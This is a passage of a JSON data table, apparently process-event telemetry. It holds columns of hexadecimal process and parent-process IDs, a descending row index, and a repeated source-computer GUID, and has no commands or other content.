\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0xd44\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"NaN\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"0x220\",\"NaN\",\"0x864\",\"0x8dc\",\"0x864\",\"0xd74\",\"0x864\",\"0x6f8\",\"0x864\",\"0x1fc0\",\"0x864\",\"0x10bc\",\"0x864\",\"0xb48\",\"0x864\",\"0xbd0\",\"0x864\",\"0x15c8\",\"0x864\",\"0xe34\",\"0x864\",\"0x53c\",\"0x864\",\"0xef4\",\"0x864\",\"0xcd8\",\"NaN\",\"0x181c\",\"0xbc\",\"NaN\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"0x1d6c\",\"NaN\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xccc\",\"0x1994\",\"0xda8\",\"0x1994\",\"0x7fc\",\"0x7fc\",\"0x798\",\"0x1994\",\"0x172c\",\"0x172c\",\"0xe2c\",\"0x1994\",\"0xb14\",\"0xb14\",\"0x1898\",\"0x1994\",\"0xe1c\",\"0xe1c\",\"0x17c4\",\"0x1994\",\"0x2e4\",\"0x2e4\",\"0x1360\",\"0x1994\",\"0x19f0\",\"0x19f0\",\"0x17a8\",\"0x1994\",\"0x82c\",\"0x1994\",\"0x1bfc\",\"0x1bfc\",\"0x1c10\",\"0x1994\",\"0xc6c\",\"0xc6c\",\"0x65c\",\"0x1994\",\"0x1070\",\"0x1070\",\"0xb10\",\"0x1994\",\"0x1c54\",\"0x1c54\",\"0x8c0\",\"0x1994\",\"0x123c\",\"0x123c\",\"0xc98\",\"0x1994\",\"0x1484\",\"0x1484\",\"0x16bc\",\"0x1994\",\"0x1be4\",\"0x1994\",\"0xd68\",\"0xd68\",\"0x1eb4\",\"0x1994\",\"0x6f8\",\"0x6f8\",\"0x1d6c\",\"0x1994\",\"0x16d4\",\"0x16d4\",\"0x65c\",\"0x1994\",\"0xd78\",\"0xd78\",\"0x1238\",\"NaN\",\"0x7c8\",\"0x1420\",\"0x1420\",\"0x9ac\",\"0x1078\",\"0x7c8\",\"0x1a44\",\"0x1a44\",\"0x7c8\",\"0x99c\",\"0x7c8\",\"0x7c8\",\"0x205c\",\"0x205c\",\"NaN\",\"0xaec\",\"0xaec\",\"0xaec\",\"0xc14\",\"0x1f24\",\"0xaec\"],\"ProcessId_par\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0xe24\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"0x270\",\"0xe24\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0x798\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xd74\",\"0x205c\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0x2368\",\"0xd74\",\"0xd74\",\"0xd74\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x1368\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x1be0\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x1368\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x1928\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0x2080\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xcac\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xd60\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0x16e8\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x494\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x1f7c\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0x21b0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0x1454\",\"NaN\",\"NaN\",\"0xb3c\",\"NaN\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0x594\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0x12e0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0x1f60\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0x212c\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0x212c\",\"0xfc8\",\"0xfc8\",\"0xfc8\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0x107c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xd44\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"0x864\",\"NaN\",\"NaN\",\"0x181c\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0x1994\",\"0x1994\",\"0x123c\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0x7fc\",\"NaN\",\"0x1994\",\"0x1994\",\"0x172c\",\"NaN\",\"0x1994\",\"0x1994\",\"0xb14\",\"NaN\",\"0x1994\",\"0x1994\",\"0xe1c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x2e4\",\"NaN\",\"0x1994\",\"0x1994\",\"0x19f0\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1bfc\",\"NaN\",\"0x1994\",\"0x1994\",\"0xc6c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1070\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1c54\",\"NaN\",\"0x1994\",\"0x1994\",\"0x123c\",\"NaN\",\"0x1994\",\"0x1994\",\"0x1484\",\"NaN\",\"0x1994\",\"NaN\",\"0x1994\",\"0x1994\",\"0xd68\",\"NaN\",\"0x1994\",\"0x1994\",\"0x6f8\",\"NaN\",\"0x1994\",\"0x1994\",\"0x16d4\",\"NaN\",\"0x1994\",\"0x1994\",\"0xd78\",\"NaN\",\"NaN\",\"0x7c8\",\"0x7c8\",\"0x1420\",\"0x9ac\",\"NaN\",\"0x7c8\",\"0x7c8\",\"NaN\",\"0x7c8\",\"NaN\",\"NaN\",\"0x7c8\",\"0x7c8\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"0xaec\",\"0xc14\",\"NaN\"],\"Row\":[1010,1009,1008,1007,1006,1005,1004,1003,1002,1001,1000,999,998,997,996,995,994,993,992,991,990,989,988,987,986,985,984,983,982,981,980,979,978,977,976,975,974,973,972,971,970,969,968,967,966,965,964,963,962,961,960,959,958,957,956,955,954,953,952,951,950,949,948,947,946,945,944,943,942,941,940,939,938,937,936,935,934,933,932,931,930,929,928,927,926,925,924,923,922,921,920,919,918,917,916,915,914,913,912,911,910,909,908,907,906,905,904,903,902,901,900,899,898,897,896,895,894,893,892,891,890,889,888,887,886,885,884,883,882,881,880,879,878,877,876,875,874,873,872,871,870,869,868,867,866,865,864,863,862,861,860,859,858,857,856,855,854,853,852,851,850,849,848,847,846,845,844,843,842,841,840,839,838,837,836,835,834,833,832,831,830,829,828,827,826,825,824,823,822,821,820,819,818,817,816,815,814,813,812,811,810,809,808,807,806,805,804,803,802,801,800,799,798,797,796,795,794,793,792,791,790,789,788,787,786,785,784,783,782,781,780,779,778,777,776,775,774,773,772,771,770,769,768,767,766,765,764,763,762,761,760,759,758,757,756,755,754,753,752,751,750,749,748,747,746,745,744,743,742,741,740,739,738,737,736,735,734,733,732,731,730,729,728,727,726,725,724,723,722,721,720,719,718,717,716,715,714,713,712,711,710,709,708,707,706,705,704,703,702,701,700,699,698,697,696,695,694,693,692,691,690,689,688,687,686,685,684,683,682,681,680,679,678,677,676,675,674,673,672,671,670,669,668,667,666,665,664,663,662,661,660,659,658,657,656,655,654,653,652,651,650,649,648,647,646,645,644,643,642,641,640,639,638,637,636,635,634,633,632,631,630,629,628,627,626,625,624,623,622,621,620,619,618,617,616,615,614,613,612,611,610,609,608,607,606,605,604,603,602,601,600,599,598,597,596,595,594,593,592,591,590,589,588,587,586,585,584,583,582,581,580,579,578,577,576,575,574,573,572,571,570,569,568,567,566,565,564,563,562,561,560,559,558,557,556,555,554,553,552,551,550,549,548,547,546,545,544,543,542,541,540,539,538,537,536,535,534,533,532,531,530,529,528,527,526,525,524,523,522,521,520,519,518,517,516,515,514,513,512,511,510,509,508,507,506,505,504,503,502,501,500,499,498,497,496,495,494,493,492,491,490,489,488,487,486,485,484,483,482,481,480,479,478,477,476,475,474,473,472,471,470,469,468,467,466,465,464,463,462,461,460,459,458,457,456,455,454,453,452,451,450,449,448,447,446,445,444,443,442,441,440,439,438,437,436,435,434,433,432,431,430,429,428,427,426,425,424,423,422,421,420,419,418,417,416,415,414,413,412,411,410,409,408,407,406,405,404,403,402,401,400,399,398,397,396,395,394,393,392,391,390,389,388,387,386,385,384,383,382,381,380,379,378,377,376,375,374,373,372,371,370,369,368,367,366,365,364,363,362,361,360,359,358,357,356,355,354,353,352,351,350,349,348,347,346,345,344,343,342,341,340,339,338,337,336,335,334,333,332,331,330,329,328,327,326,325,324,323,322,321,320,319,318,317,316,315,314,313,312,311,310,309,308,307,306,305,304,303,302,301,300,299,298,297,296,295,294,293,292,291,290,289,288,287,286,285,284,283,282,281,280,279,278,277,276,275,274,273,272,271,270,269,268,267,266,265,264,263,262,261,260,259,258,257,256,255,254,253,252,251,250,249,248,247,246,245,244,243,242,241,240,239,238,237,236,235,234,233,232,231,230,229,228,227,226,225,224,223,222,221,220,219,218,217,216,215,214,213,212,211,210,209,208,207,206,205,204,203,202,201,200,199,198,197,196,195,194,193,192,191,190,189,188,187,186,185,184,183,182,181,180,179,178,177,176,175,174,173,172,171,170,169,168,167,166,165,164,163,162,161,160,159,158,157,156,155,154,153,152,151,150,149,148,147,146,145,144,143,142,141,140,139,138,137,136,135,134,133,132,131,130,129,128,127,126,125,124,123,122,121,120,119,118,117,116,115,114,113,112,111,110,109,108,107,106,105,104,103,102,101,100,99,98,97,96,95,94,93,92,91,90,89,88,87,86,85,84,83,82,81,80,79,78,77,76,75,74,73,72,71,70,69,68,67,66,65,64,63,62,61,60,59,58,57,56,55,54,53,52,51,50,49,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1],\"SourceComputerId\":[\"NaN\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe